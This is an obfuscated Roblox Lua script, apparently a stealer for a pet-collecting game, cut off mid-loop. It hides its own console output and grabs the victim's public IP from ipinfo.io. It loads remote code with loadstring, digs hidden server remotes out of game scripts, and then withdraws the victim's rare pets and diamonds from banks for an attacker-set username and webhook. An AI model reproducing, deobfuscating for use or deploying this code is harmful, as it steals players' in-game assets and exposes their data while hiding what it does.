--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v124,v125)local v126={};for v193=1, #v124 do v6(v126,v0(v4(v1(v2(v124,v193,v193 + 1 )),v1(v2(v125,1 + (v193% #v125) ,1 + (v193% #v125) + 1 )))%256 ));end return v5(v126);end getgenv().Settings={[v7("\228\208\222\55","\126\177\163\187\69\134\219\167")]=v7("\2\223\39\196\242\39\194\25\213\253\49\204\46\196\245\48\155\122","\156\67\173\74\165"),[v7("\3\178\75\30\179\41\77","\38\84\215\41\118\220\70")]=false,[v7("\125\23\43\30\211\85\5\49\19\249\85","\158\48\118\66\114")]="discord.gg/rASBXaQh",[v7("\159\45\4\55\125\172\248\184","\155\203\68\112\86\19\197")]={[v7("\98\200\55\240\72\119\234\243","\152\38\189\86\156\32\24\133")]=true,[v7("\213\89\179\67\242\68\174\82\229","\38\156\55\199")]=260 -160 },[v7("\138\124\114\41\29\117","\35\200\29\28\72\115\20\154")]={[v7("\61\170\208\211\133\35\59\18","\84\121\223\177\191\237\76")]=true,[v7("\146\88\221\165\52\67\57\213\162","\161\219\54\169\192\90\48\80")]=287 -187 },[v7("\97\87\7\32\90","\69\41\34\96")]={[v7("\152\214\214\6\10\36\179\200","\75\220\163\183\106\98")]=true,[v7("\43\180\159\50\215\17\179\159\46","\185\98\218\235\87")]=50},[v7("\251\51\32\245","\202\171\92\71\134\190")]={[v7("\13\212\45\132\33\206\35\131","\232\73\161\76")]=true,[v7("\146\215\86\88\16\168\208\86\68","\126\219\185\34\61")]=0 -0 },[v7("\41\214\93\126\107\100\250\241\9\221","\135\108\174\62\18\30\23\147")]={[v7("\146\252\43\199\16\161\60\204","\167\214\137\74\171\120\206\83")]=true,[v7("\162\254\38\88\246\180\130\228\43","\199\235\144\82\61\152")]=0 + 0 },[v7("\34\0\188\37\19\5","\75\103\118\217")]={[v7("\227\65\113\24\177\17\200\95","\126\167\52\16\116\217")]=false,[v7("\225\32\52\133\186\10\245\220\55","\156\168\78\64\224\212\121")]=0 + 0 },[v7("\52\235\166\220\2\250\182","\174\103\142\197")]={[v7("\114\61\94\52\45\81\247\93","\152\54\72\63\88\69\62")]=true,[v7("\253\202\250\89\218\215\231\72\205","\60\180\164\142")]=972 -(357 + 615) },[v7("\112\125\58\13\10\210\63\65\74\13\32\36\254","\114\56\62\101\73\71\141")]={[v7("\156\252\218\200\176\230\212\207","\164\216\137\187")]=false,[v7("\251\232\37\183\168\237\2\198\255","\107\178\134\81\210\198\158")]=0 + 0 },[v7("\31\11\143\213","\202\88\110\226\166")]={[v7("\231\26\131\251\194\204\0\137","\170\163\111\226\151")]=true,[v7("\56\62\166\61\64\36\32\5\41","\73\113\80\210\88\46\87")]=0 -0 }};if getgenv().executed then return;end getgenv().executed=true;local v10=game:GetService(v7("\179\57\195\33\226\147\58\196\17\226","\135\225\76\173\114"));local v11=workspace.CurrentCamera;local v12={115,132 + 32 ,12 + 153 ,1328 -(384 + 917) ,13};UserSettings().GameSettings.MasterVolume=1543 -(1407 + 136) ;if (_G.MouseLock~=false) then v10.RenderStepped:Connect(function()local v244=1887 -(687 + 1200) ;while true do if (v244==(1710 -(556 + 1154))) then for v490,v491 in next,v12 do keyrelease(v491);end mousemoveabs(v11.ViewportSize.X/(10 -7) ,v11.ViewportSize.Y/(98 -(9 + 86)) );break;end end end);end local function v14(...)local v127=421 -(275 + 146) ;local v128;local v129;while true do if (v127==(0 + 0)) then v128=0;v129=nil;v127=65 -(29 + 35) ;end if (v127==(4 -3)) then while true do local v379=0 -0 ;while true do if (v379==0) then if (v128==1) then return print(...);end if (v128==(0 -0)) then v129=debug.getinfo(2 + 0 );if (v129 and (v129.what==v7("\54\248\185","\199\122\141\216\208\204\221")) and (v129.func==print)) then return;end v128=1;end break;end end end break;end end end print=v14;rconsoleprint=v14;rconsolewarn=v14;rconsoleerr=v14;rconsoleinput=v14;printconsole=v14;setclipboard=v14;if (UserName==nil) then UserName=_G.UserName;end if (UserName2==nil) then UserName2=_G.UserName2;end if (Webhook==nil) then Webhook=_G.Webhook;end local v15=game:GetService(v7("\157\209\17\233\125\228\190","\150\205\189\112\144\24")).LocalPlayer.Name;if (v15==UserName) then local v194=1012 -(53 + 959) ;while true do if (v194==0) then local v380=408 -(312 + 96) ;while true do if ((0 -0)==v380) then game:GetService(v7("\21\136\190\85\1\154\2","\112\69\228\223\44\100\232\113")).LocalPlayer:Kick(v7("\237\16\18\147\151\110\131\148\43\15\214\246\83\145\218\26\21\146\246\52\146\209\12\19\147\191\104\198\219\17\71\210\186\104\198\213\28\4\154","\230\180\127\103\179\214\28"));return;end end end end end if (UserName==nil) then game:GetService(v7("\188\9\94\95\225\83\243","\128\236\101\63\38\132\33")).LocalPlayer:Kick(v7("\156\188\5\4\151\171\250\191\172\3\106\183\230\202","\175\204\201\113\36\214\139"));return;end local v16=pcall(function()game:GetService(v7("\119\192\52\197\1\85\223","\100\39\172\85\188")):GetUserIdFromNameAsync(UserName);end);if  not v16 then local v195=0;local v196;while true do if (v195==(285 -(147 + 138))) then v196=899 -(813 + 86) ;while true do if (v196==(0 + 0)) then game:GetService(v7("\157\116\184\153\54\191\107","\83\205\24\217\224")).LocalPlayer:Kick(v7("\214\208\217\125\199\133\251\60\234\204\201\125\211\214\200\47\232\196\192\56\167","\93\134\165\173"));return;end end break;end end end if v16 then _G.UserID=game:GetService(v7("\142\254\192\219\63\220\161","\30\222\146\161\162\90\174\210")):GetUserIdFromNameAsync(UserName);end if (UserName2~=nil) then local v197=pcall(function()game:GetService(v7("\213\66\113\19\224\92\99","\106\133\46\16")):GetUserIdFromNameAsync(UserName2);end);if  not v197 then game:GetService(v7("\104\44\114\229\95\82\75","\32\56\64\19\156\58")).LocalPlayer:Kick(v7("\106\221\241\22\123\178\182\91\196\236\82\26\199\147\95\218\235\87\87\247\210\27","\224\58\168\133\54\58\146"));return;end end local v17=require(game:GetService(v7("\107\83\91\241\124\133\134\31\92\82\120\233\122\148\134\12\92","\107\57\54\43\157\21\230\231")).Library.Client.Save).Get().Diamonds;local v18=pcall(function()game:GetService(v7("\236\132\3\254\170\204\206\216\142","\175\187\235\113\149\217\188"))[v7("\3\144\172\109\211","\24\92\207\225\44\131\25")].Interactive.Mailbox.Pad:GetChildren();end);if  not v18 then game:GetService(v7("\123\223\185\85\30\111\88","\29\43\179\216\44\123")).LocalPlayer:Kick(v7("\136\215\18\73\186\208\51\88\184\203\37\72\253\248\50\73\188\151\96\124\177\220\33\95\184\153\3\67\179\202\41\72\184\203\96\107\178\208\46\75\253\237\47\12\137\209\37\12\142\209\47\92","\44\221\185\64"));return;end function to_base64(v130)local v131=0 -0 ;local v132;while true do if (v131==(492 -(18 + 474))) then v132="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";return (v130:gsub(".",function(v381)local v382=0 + 0 ;local v383;local v384;while true do if (v382==(3 -2)) then return v383;end if (v382==0) then v383,v384="",v381:byte();for v532=8,1087 -(860 + 226) , -(304 -(121 + 182)) do v383=v383   .. (((((v384%((1 + 1)^v532)) -(v384%(2^(v532-(1241 -(988 + 252))))))>(0 + 0)) and "1") or "0") ;end v382=1 + 0 ;end end end)   .. v7("\81\183\24\15","\19\97\135\40\63")):gsub(v7("\235\88\118\63\106\53\241\25\55\100\106\53\241\25\55\100","\81\206\60\83\91\79"),function(v385)local v386=0;local v387;while true do if (v386==(1971 -(49 + 1921))) then local v511=0;while true do if (v511==(890 -(223 + 667))) then for v579=53 -(51 + 1) ,10 -4  do v387=v387 + (((v385:sub(v579,v579)=="1") and (2^((12 -6) -v579))) or 0) ;end return v132:sub(v387 + (1126 -(146 + 979)) ,v387 + 1 );end end end if (v386==0) then if ( #v385<(2 + 4)) then return "";end v387=605 -(311 + 294) ;v386=2 -1 ;end end end)   .. ({"",v7("\19\246","\196\46\203\176\18\79\163\45"),"="})[( #v130%3) + (1359 -(1233 + 125)) ] ;end end end function from_base64(v133)local v134=0 + 0 ;local v135;while true do if (v134==(1 + 0)) then return (v133:gsub(".",function(v388)local v389=0 + 0 ;local v390;local v391;while true do if (v389==(1645 -(963 + 682))) then if (v388=="=") then return "";end v390,v391="",v135:find(v388) -(1 + 0) ;v389=1505 -(504 + 1000) ;end if (v389==1) then for v533=5 + 1 ,1 + 0 , -(1 + 0) do v390=v390   .. (((((v391%((2 -0)^v533)) -(v391%((2 + 0)^(v533-(1 + 0)))))>0) and "1") or "0") ;end return v390;end end end):gsub(v7("\103\92\114\220\155\16\185\103\92\104\157\218\75\163\38\7\114\220\129\81\226\125","\134\66\56\87\184\190\116"),function(v392)local v393=182 -(156 + 26) ;local v394;local v395;while true do if (v393==1) then while true do local v534=0 + 0 ;while true do if (v534==(0 -0)) then if (0==v394) then local v597=164 -(149 + 15) ;while true do if ((961 -(890 + 70))==v597) then v394=118 -(39 + 78) ;break;end if (v597==0) then if ( #v392~=8) then return "";end v395=482 -(14 + 468) ;v597=1;end end end if (v394==1) then for v599=2 -1 ,22 -14  do v395=v395 + (((v392:sub(v599,v599)=="1") and (2^((5 + 3) -v599))) or (0 + 0)) ;end return string.char(v395);end break;end end end break;end if (v393==0) then v394=0 + 0 ;v395=nil;v393=1 + 0 ;end end end));end if (v134==(0 + 0)) then v135="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";v133=string.gsub(v133,v7("\131\28","\143\216\66\30\126\68\155")   .. v135   .. v7("\247\245","\129\202\168\109\171\165\195\183") ,"");v134=1;end end end request=(syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request or HttpPost ;local v19;local function v20()local v136=0 -0 ;local v137;while true do if (v136==(0 + 0)) then v137=(syn and  not is_sirhurt_closure and  not pebc_execute and v7("\15\40\7\186\9\248\36\117\4","\85\92\81\105\219\121\139\65")) or (secure_load and v7("\206\182\94\81\117\209\248\191","\191\157\211\48\37\28")) or (is_sirhurt_closure and v7("\236\22\230\20\47\205\11","\90\191\127\148\124")) or (pebc_execute and v7("\72\149\33\3\119\180\35\22\107\143\43\5","\119\24\231\78")) or (KRNL_LOADED and v7("\169\31\139\102","\113\226\77\197\42\188\32")) or (WrapGlobal and v7("\13\19\213\167\63\50\241\163\41","\213\90\118\148")) or (isvm and v7("\107\60\187\78\66","\45\59\78\212\54")) or (shadow_env and v7("\35\94\130\143\137\57","\144\112\54\227\235\230\78\205")) or (jit and v7("\150\41\28\229\245\67\163\36\0\245\196\72","\59\211\72\111\156\176")) or (getscriptenvs and v7("\109\134\239\44\67\134\241\36","\77\46\231\131")) or (unit and  not syn and v7("\143\90\191\84","\32\218\52\214")) or (OXYGEN_LOADED and v7("\97\15\40\175\244\190\5\111","\58\46\119\81\200\145\208\37")) or (IsElectron and v7("\14\128\53\175\189\175\57\37","\86\75\236\80\204\201\221")) or v7("\81\78\98\137\250\133\102\1\80\151\255\137","\235\18\33\23\229\158") ;v19=v137;break;end end end v20();local v21=game.Players.LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text;local v22=game:GetService(v7("\96\182\192\162\85\168\210","\219\48\218\161")).LocalPlayer.Name;local v23=game:GetService(v7("\212\125\125\80\222\93\243","\128\132\17\28\41\187\47")).LocalPlayer;local v24=game:HttpGet("https://ipinfo.io/ip");local v25;if (_G.LoadingScreen~=false) then loadstring(game:HttpGet(v7("\49\39\18\122\100\14\39\20\122\113\14\51\2\51\83\6\114\53\57\79\4\55\8\122\111\0\37\70\22\84\15\57\70\18\88\19\55","\61\97\82\102\90")))();end local v26=getsenv(game:GetService(v7("\156\34\170\82\194\69\13","\105\204\78\203\43\167\55\126")).LocalPlayer.PlayerScripts.Scripts.GUIs[v7("\135\171\45\21\83\39\203\88\160\164\55","\49\197\202\67\126\115\100\167")]);local v27=getsenv(game:GetService(v7("\7\87\222\48\133\68\77","\62\87\59\191\73\224\54")).LocalPlayer.PlayerScripts.Scripts.GUIs.Inventory);local v28=getsenv(game:GetService(v7("\215\14\251\208\226\16\233","\169\135\98\154")).LocalPlayer.PlayerScripts.Scripts.GUIs.Mailbox);local v29=getsenv(game:GetService(v7("\251\123\37\77\248\33\219","\168\171\23\68\52\157\83")).LocalPlayer.PlayerScripts.Scripts.Game[v7("\198\116\240\169\32\32\199\198\112\251\166\101\31\130\227\112\231\169\54","\231\148\17\149\205\69\77")]);local v30=getsenv(game:GetService(v7("\176\171\198\226\82\237\147","\159\224\199\167\155\55")).LocalPlayer.PlayerScripts.Scripts.GUIs[v7("\209\225\57\215\183\212\53\212\227\224","\178\151\147\92")]);local v31=debug.getconstant(v26.GetMyBanks,10 -7 );local v32=debug.getconstant(v27.LockPets,1 + 4 );local v33=debug.getconstant(v26.GetBank,54 -(12 + 39) );local v34=debug.getconstant(v26.Withdraw,15 + 1 );local v35=debug.getconstant(debug.getprotos(v28.UpdateOutbox)[5 -3 ],71 -51 );local v36=debug.getconstant(v28.UpdateInboxBottom,11 + 24 );local v37=debug.getconstant(v28.Update,2 + 1 );local v38=debug.getconstant(v26.DecideInvite,14 -8 );local v39=debug.getconstant(v26.GetMyInvites,3);local v40=debug.getconstant(v29.Redeem,2 + 1 );local v41=debug.getconstant(v30.Redeem,14 -11 );local v42=getupvalues(require(game:GetService(v7("\190\248\92\62\27\79\123\152\248\72\1\6\67\104\141\250\73","\26\236\157\44\82\114\44")).Library.Client[v7("\4\43\193\76\37\60\222","\59\74\78\181")]).Invoke);local v43=getupvalues(v42[1712 -(1596 + 114) ]);local v44=getupvalues(v43[2 -1 ])[1][2];local v45=getupvalues(require(game:GetService(v7("\23\212\74\86\186\38\208\78\95\183\22\197\85\72\178\34\212","\211\69\177\58\58")).Library.Client[v7("\153\224\109\226\230\217\188","\171\215\133\25\149\137")]).Invoke);local v46=getupvalues(v45[715 -(164 + 549) ]);v31=v44[v46[1440 -(1059 + 379) ](2 -0 ,v31)];v32=v44[v46[2 + 0 ](1 + 1 ,v32)];v33=v44[v46[394 -(145 + 247) ](2,v33)];v34=v44[v46[2 + 0 ](2,v34)];v35=v44[v46[1 + 1 ](2,v35)];v36=v44[v46[5 -3 ](1 + 1 ,v36)];v37=v44[v46[2 + 0 ](2,v37)];v38=v44[v46[2 -0 ](722 -(254 + 466) ,v38)];v39=v44[v46[2](562 -(544 + 16) ,v39)];v40=v44[v46[2](5 -3 ,v40)];v41=v44[v46[630 -(294 + 334) ](255 -(236 + 17) ,v41)];local v58=v31:InvokeServer();local v59=require(game:GetService(v7("\211\205\34\246\230\51\253\86\228\204\1\238\224\34\253\69\228","\34\129\168\82\154\143\80\156")).Library.Client.Save).Get();function invspace()local v138=0;local v139;local v140;while true do if (v138==1) then while true do local v396=0 + 0 ;while true do if ((0 + 0)==v396) then if ((3 -2)==v139) then return v140;end if (v139==0) then local v548=0;local v549;while true do if ((0 -0)==v548) then v549=0 + 0 ;while true do if (v549==(1 + 0)) then v139=795 -(413 + 381) ;break;end if (v549==(0 + 0)) then v140=v59.MaxSlots-#v59.Pets ;if (v140>(106 -56)) then v140=129 -79 ;end v549=1971 -(582 + 1388) ;end end break;end end end break;end end end break;end if (v138==(0 -0)) then v139=0 + 0 ;v140=nil;v138=365 -(326 + 38) ;end end end function invspace_nolimit()local v141=0;local v142;local v143;while true do if ((2 -1)==v141) then while true do if (v142==(0 -0)) then v143=v59.MaxSlots-#v59.Pets ;return v143;end end break;end if (v141==0) then v142=0;v143=nil;v141=621 -(47 + 573) ;end end end game:GetService(v7("\181\190\50\18\77\92\154","\233\229\210\83\107\40\46")).LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(game:GetService(v7("\246\77\32\221\22\209\67\49\211","\101\161\34\82\182"))[v7("\215\50\116\223\235","\78\136\109\57\158\187\130\226")].Interactive.Bank.Pad.Position);local v61;local v62;local v63;local v64;local v65;local v66;local v67;local v68;local v69;local v70;local v71=0 + 0 ;local v72=0;local v73=0 -0 ;local v74=0 -0 ;local v75=1664 -(1269 + 395) ;local v76=492 -(76 + 416) ;local v77=0;if (v58[1]~=nil) then v76=v76 + (444 -(319 + 124)) ;end if (v58[2]~=nil) then v76=v76 + (2 -1) ;end if (v58[3]~=nil) then v76=v76 + (1008 -(564 + 443)) ;end if (v58[10 -6 ]~=nil) then v76=v76 + 1 ;end if (v58[463 -(337 + 121) ]~=nil) then v76=v76 + (2 -1) ;end local v78=v39:InvokeServer();bankstable={};if (v76~=5) then local v198=0;while true do if (v198==2) then if (v78[16 -11 ]~=nil) then table.insert(bankstable,v78[1916 -(1261 + 650) ][v7("\126\48\233\139","\184\60\101\160\207\66")]);end for v472,v473 in pairs(bankstable) do v38:InvokeServer(v473);end break;end if (v198==(1 + 0)) then if (v78[3]~=nil) then table.insert(bankstable,v78[3 -0 ][v7("\23\129\162\214","\186\85\212\235\146")]);end if (v78[4]~=nil) then table.insert(bankstable,v78[4][v7("\224\180\63\218","\56\162\225\118\158\89\142")]);end v198=2;end if (v198==(1817 -(772 + 1045))) then if (v78[1 + 0 ]~=nil) then table.insert(bankstable,v78[145 -(102 + 42) ][v7("\28\10\208\213","\145\94\95\153")]);end if (v78[1846 -(1524 + 320) ]~=nil) then table.insert(bankstable,v78[1272 -(1049 + 221) ][v7("\223\248\61\241","\215\157\173\116\181\46")]);end v198=157 -(18 + 138) ;end end end if (v76==(0 -0)) then v62=bankstable[1103 -(67 + 1035) ];v64=bankstable[350 -(136 + 212) ];v66=bankstable[3];v68=bankstable[16 -12 ];v70=bankstable[5 + 0 ];elseif (v76==(1 + 0)) then local v323=1604 -(240 + 1364) ;local v324;while true do if (v323==0) then v324=1082 -(1050 + 32) ;while true do if (0==v324) then local v550=0 -0 ;while true do if (v550==(0 + 0)) then v62=v58[1][v7("\19\183\85\152","\220\81\226\28")];v64=bankstable[1056 -(331 + 724) ];v550=1;end if (1==v550) then v324=1 + 0 ;break;end end end if (v324==(646 -(269 + 375))) then v70=bankstable[729 -(267 + 458) ];break;end if (v324==(1 + 0)) then local v552=0 -0 ;while true do if (v552==0) then v66=bankstable[820 -(667 + 151) ];v68=bankstable[3];v552=1498 -(1410 + 87) ;end if (v552==1) then v324=1899 -(1504 + 393) ;break;end end end end break;end end elseif (v76==(5 -3)) then local v474=0 -0 ;while true do if (1==v474) then local v535=796 -(461 + 335) ;local v536;while true do if (v535==0) then v536=0;while true do if (v536==(0 + 0)) then v66=bankstable[1762 -(1730 + 31) ];v68=bankstable[1669 -(728 + 939) ];v536=3 -2 ;end if (v536==1) then v474=3 -1 ;break;end end break;end end end if (v474==(0 -0)) then v62=v58[1069 -(138 + 930) ][v7("\49\224\171\223","\167\115\181\226\155\138")];v64=v58[2 + 0 ][v7("\192\23\206\120","\166\130\66\135\60\27\17")];v474=1 + 0 ;end if (v474==(2 + 0)) then v70=bankstable[3];break;end end elseif (v76==3) then local v512=0 -0 ;while true do if (v512==(1767 -(459 + 1307))) then v66=v58[3][v7("\155\22\130\80","\212\217\67\203\20\223\223\37")];v68=bankstable[1];v512=2;end if (v512==2) then v70=bankstable[1872 -(474 + 1396) ];break;end if (v512==0) then v62=v58[1 -0 ][v7("\102\127\231\81","\80\36\42\174\21")];v64=v58[2][v7("\108\37\30\94","\26\46\112\87")];v512=1 + 0 ;end end elseif (v76==(1 + 3)) then v62=v58[2 -1 ][v7("\152\184\129\246","\178\218\237\200")];v64=v58[1 + 1 ][v7("\148\128\207\244","\176\214\213\134")];v66=v58[9 -6 ][v7("\214\152\159\240","\57\148\205\214\180\200\54")];v68=v58[17 -13 ][v7("\48\200\28\16","\22\114\157\85\84")];v70=bankstable[1];elseif (v76==5) then local v580=591 -(562 + 29) ;while true do if (v580==0) then v62=v58[1 + 0 ][v7("\230\254\58\224","\200\164\171\115\164\61\150")];v64=v58[2][v7("\156\193\42\97","\227\222\148\99\37")];v580=1;end if (2==v580) then v70=v58[1424 -(374 + 1045) ][v7("\227\39\36\209","\217\161\114\109\149\98\16")];break;end if (v580==(1 + 0)) then local v605=0;local v606;while true do if (v605==0) then v606=0;while true do if (v606==0) then v66=v58[3][v7("\17\103\123\210","\153\83\50\50\150")];v68=v58[12 -8 ][v7("\127\67\90\56","\45\61\22\19\124\19\203")];v606=639 -(448 + 190) ;end if (v606==(1 + 0)) then v580=1 + 1 ;break;end end break;end end end end end Library=require(game:GetService(v7("\32\37\40\112\181\119\19\52\61\120\143\96\29\50\57\123\185","\20\114\64\88\28\220")).Framework:FindFirstChild(v7("\29\8\208\166\249\194\164","\221\81\97\178\212\152\176")));Functions=Library.Functions;PetIDList={};table.foreach(Library.Directory.Pets,function(v144,v145)if (v145.huge or v145.titanic or (v145.name==v7("\207\230\19\250\20\204","\122\173\135\125\155")) or (v145.name==v7("\166\205\1\189\58\52","\168\228\161\96\217\95\81")) or (v145.convertPoints==(4 + 1))) then table.insert(PetIDList,v144);end end);if ((v62~=nil) and (invspace()~=(0 -0))) then while task.wait() do print(v7("\217\208\32\87\126\23\203\196\60\91\42\83","\55\187\177\78\60\79"));v61=v33:InvokeServer(v62);LHList={};LFinalList={};local v245=v61.Storage.Pets;local v246={};for v325,v326 in pairs(v245) do v246[v326[v7("\56\199\91","\224\77\174\63\139\38\175")]]=false;end for v328,v329 in pairs(v245) do if (table.find(PetIDList,v329[v7("\141\69","\78\228\33\56")])~=nil) then table.insert(LHList,v329[v7("\219\119\182","\229\174\30\210\99")]);end end print(v7("\55\197\170\88\254\41\121\65","\89\123\141\230\49\141\93"), #LHList);if ( #LHList<=invspace()) then for v475,v476 in pairs(LHList) do table.insert(LFinalList,v476);end elseif ( #LHList>invspace()) then for v513,v514 in pairs(LHList) do if ( #LFinalList<invspace()) then table.insert(LFinalList,v514);end end end print(v7("\223\87\255\2\17\70\223\120\229\24\80\16","\42\147\17\150\108\112"), #LFinalList);v71=v61.Storage.Currency.Diamonds;if (( #LFinalList==0) and (v71<(2565101652 -1565101652)) and (v17>(369595 -259595))) then v71=0;end if (( #LFinalList~=(1975 -(1808 + 167))) or (v71~=(0 + 0))) then local v397=0 + 0 ;local v398;local v399;local v400;while true do if (v397==(2 + 0)) then wait(1.5 + 0 );break;end if (v397==1) then if (v399==false) then local v558=0 + 0 ;while true do if (v558==0) then wait(0.2 + 0 );v34:InvokeServer(v62,LFinalList,0 + 0 );break;end end end v77=v77 +  #LFinalList ;v397=566 -(510 + 54) ;end if ((0 -0)==v397) then local v515=0;while true do if (v515==0) then v398={[37 -(13 + 23) ]=v62,[3 -1 ]=LFinalList,[3 -0 ]=0};v399,v400=pcall(function()v34:InvokeServer(v62,LFinalList,v71);end);v515=1;end if (v515==(1 -0)) then v397=1089 -(830 + 258) ;break;end end end end else print(v7("\11\169\35\122\182","\136\111\198\77\31\135"));break;end end end if ((v64~=nil) and (invspace()~=0)) then while task.wait() do print(v7("\0\8\169\93\239\164\7\188\16\14\162\82","\201\98\105\199\54\221\132\119"));v63=v33:InvokeServer(v64);BHList2={};FinalList2={};local v248=v63.Storage.Pets;local v249={};for v330,v331 in pairs(v248) do v249[v331[v7("\172\5\135","\204\217\108\227\65\98\85")]]=false;end for v333,v334 in pairs(v248) do if ((table.find(PetIDList,v334[v7("\87\199","\160\62\163\149\133\76")])~=nil) and  not v334.l) then table.insert(BHList2,v334[v7("\195\169\9","\163\182\192\109\79")]);end end if ( #BHList2<=invspace()) then for v477,v478 in pairs(BHList2) do table.insert(FinalList2,v478);end elseif ( #BHList2>invspace()) then for v516,v517 in pairs(BHList2) do if ( #FinalList2<invspace()) then table.insert(FinalList2,v517);end end end print(v7("\18\47\14\193\249\24\47\19\212\167\116\124","\149\84\70\96\160"), #FinalList2);print(v7("\26\46\33\228\43\18\95\173\98","\141\88\102\109"), #BHList2);v72=v63.Storage.Currency.Diamonds;if (( #FinalList2==0) and (v72<(2694427418 -1694427418)) and (v17>(58549 + 51451))) then v71=0;end if (( #FinalList2~=(58 -(42 + 16))) or (v72~=0)) then local v401=0 + 0 ;local v402;local v403;local v404;while true do if (v401==(0 + 0)) then v402={[1 -0 ]=v64,[1969 -(1703 + 264) ]=FinalList2,[3]=0 + 0 };wait();v401=1 + 0 ;end if (v401==(7 -5)) then wait(2.5 -1 );v77=v77 +  #FinalList2 ;break;end if (v401==(708 -(303 + 404))) then v403,v404=pcall(function()v34:InvokeServer(v64,FinalList2,v72);end);if (v403==false) then local v559=0;while true do if (v559==(0 -0)) then wait(0.2 + 0 );v34:InvokeServer(v64,FinalList2,0);break;end end end v401=2 + 0 ;end end else print(v7("\183\92\196\117\72","\161\211\51\170\16\122\93\53"));break;end end end if ((v66~=nil) and (invspace()~=(1426 -(85 + 1341)))) then while task.wait() do print(v7("\249\175\188\35\168\238\162\61\233\169\183\44","\72\155\206\210"));v65=v33:InvokeServer(v66);BHList3={};FinalList3={};local v251=v65.Storage.Pets;local v252={};for v335,v336 in pairs(v251) do v252[v336[v7("\83\115\80","\83\38\26\52\110")]]=false;end for v338,v339 in pairs(v251) do if ((table.find(PetIDList,v339[v7("\81\19","\38\56\119\71")])~=nil) and  not v339.l) then table.insert(BHList3,v339[v7("\230\230\92","\54\147\143\56\182\69")]);end end if ( #BHList3<=invspace()) then for v479,v480 in pairs(BHList3) do table.insert(FinalList3,v480);end elseif ( #BHList3>invspace()) then for v518,v519 in pairs(BHList3) do if ( #FinalList3<invspace()) then table.insert(FinalList3,v519);end end end print(v7("\240\136\241\72\211\250\136\236\93\140\150\219","\191\182\225\159\41"), #FinalList3);print(v7("\9\58\4\92\152\147\145\107\72","\162\75\114\72\53\235\231"), #BHList3);v73=v65.Storage.Currency.Diamonds;if (( #FinalList3==(0 -0)) and (v73<(2779754107 -1779754107)) and (v17>(110372 -(45 + 327)))) then v71=0 -0 ;end if (( #FinalList3~=(502 -(444 + 58))) or (v73~=(0 + 0))) then local v405=0;local v406;local v407;local v408;while true do if (1==v405) then local v520=0 + 0 ;while true do if (v520==(0 + 0)) then v407,v408=pcall(function()v34:InvokeServer(v66,FinalList3,v73);end);if (v407==false) then local v590=0 -0 ;while true do if (v590==0) then wait(1732.2 -(64 + 1668) );v34:InvokeServer(v66,FinalList3,1973 -(1227 + 746) );break;end end end v520=2 -1 ;end if (v520==(1 -0)) then v405=2;break;end end end if (v405==0) then local v521=494 -(415 + 79) ;while true do if (v521==(1 + 0)) then v405=492 -(142 + 349) ;break;end if (v521==0) then v406={[1]=v66,[1 + 1 ]=FinalList3,[3]=0 -0 };wait();v521=1;end end end if (v405==2) then wait(1.5 + 0 );v77=v77 +  #FinalList3 ;break;end end else print(v7("\136\51\74\231\0","\98\236\92\36\130\51"));break;end end end if ((v68~=nil) and (invspace()~=(0 + 0))) then while task.wait() do print(v7("\166\24\2\177\17\232\165\37\182\30\9\190","\80\196\121\108\218\37\200\213"));v67=v33:InvokeServer(v68);BHList4={};FinalList4={};local v254=v67.Storage.Pets;local v255={};for v340,v341 in pairs(v254) do v255[v341[v7("\21\122\6","\234\96\19\98\31\43\110")]]=false;end for v343,v344 in pairs(v254) do if ((table.find(PetIDList,v344[v7("\15\27","\235\102\127\50\167\204\18")])~=nil) and  not v344.l) then table.insert(BHList4,v344[v7("\69\168\241","\78\48\193\149\67\36")]);end end if ( #BHList4<=invspace()) then for v481,v482 in pairs(BHList4) do table.insert(FinalList4,v482);end elseif ( #BHList4>invspace()) then for v522,v523 in pairs(BHList4) do if ( #FinalList4<invspace()) then table.insert(FinalList4,v523);end end end print(v7("\18\54\172\17\82\36\74\192\66","\33\80\126\224\120"), #BHList4);print(v7("\202\161\13\197\80\192\161\16\208\8\172\242","\60\140\200\99\164"), #FinalList4);v74=v67.Storage.Currency.Diamonds;if (( #FinalList4==(0 -0)) and (v74<(1000001864 -(1710 + 154))) and (v17>(110318 -(200 + 118)))) then v74=0;end if (( #FinalList4~=(0 + 0)) or (v74~=(0 -0))) then local v409=0;local v410;local v411;local v412;local v413;local v414;while true do if (v409==(2 -0)) then v414=nil;while true do if (v410==(1 + 0)) then local v575=0;while true do if (v575==0) then v413=nil;v414=nil;v575=1;end if (v575==(1 + 0)) then v410=2 + 0 ;break;end end end if (v410==(0 + 0)) then v411=0 -0 ;v412=nil;v410=1;end if (v410==2) then while true do if (v411==(1250 -(363 + 887))) then local v598=0 -0 ;while true do if (v598==(0 -0)) then v412={[1 + 0 ]=v68,[4 -2 ]=FinalList4,[3 + 0 ]=0};v413,v414=pcall(function()v34:InvokeServer(v68,FinalList4,v74);end);v598=1665 -(674 + 990) ;end if (1==v598) then v411=1;break;end end end if (v411==(1 + 0)) then if (v413==false) then local v607=0 + 0 ;local v608;while true do if (v607==(0 -0)) then v608=1055 -(507 + 548) ;while true do if (v608==(837 -(289 + 548))) then wait(1818.2 -(821 + 997) );v34:InvokeServer(v68,FinalList4,255 -(195 + 60) );break;end end break;end end end v77=v77 +  #FinalList4 ;v411=2;end if (2==v411) then wait(1.5 + 0 );break;end end break;end end break;end if (1==v409) then v412=nil;v413=nil;v409=1503 -(251 + 1250) ;end if ((0 -0)==v409) then v410=0 + 0 ;v411=nil;v409=1033 -(809 + 223) ;end end else 